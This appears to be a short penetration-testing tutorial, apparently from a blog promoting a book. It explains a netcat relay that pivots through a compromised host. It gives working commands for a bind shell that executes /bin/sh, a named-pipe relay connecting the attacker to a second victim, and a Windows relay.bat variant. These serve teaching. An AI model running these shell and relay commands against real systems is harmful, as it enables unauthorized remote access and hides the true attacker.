The netcat relay works if you have 3 hosts:
Host 1 - 10.9.9.5 - Attacker
Host 2 - 10.9.9.10 - Compromised Victim (Pivot point or relay point)
Host 3 - 10.9.9.15 - Compromised Victim
On Host 1 you execute: "nc -l -p 4545". This opens a listening port on your attacking computer.
On Host 3 you execute: "nc -l -p 2525 -e /bin/sh". This opens a listening port and upon connect executes an interactive shell.
Then on Host 2 you execute the following commands:
"mknod backpipe p"
"nc 10.9.9.5 4545 0<backpipe | nc 10.9.9.15 2525 1>backpipe"
If a windows host was in the middle you would execute the following:
"echo nc 10.9.9.15 2525 > relay.bat" # You need permission to write a file called relay.bat
"nc 10.9.9.5 4545 -e relay.bat"
The commands that are executed on Host 1 are then relayed through Host 2 to Host 3 giving the appearance that Host 2 is the one attacking Host 3.
Here is a link to SANS netcat cheat sheet demonstrating how it can be done on Windows also.
Here is a link to a video that goes through the above scenario using 3 linux hosts. In the book it is a little different due to only using an Attacker and a Victim for their example, which works also!
Below if you click on the picture of the book it will take you to how you can order it on Amazon: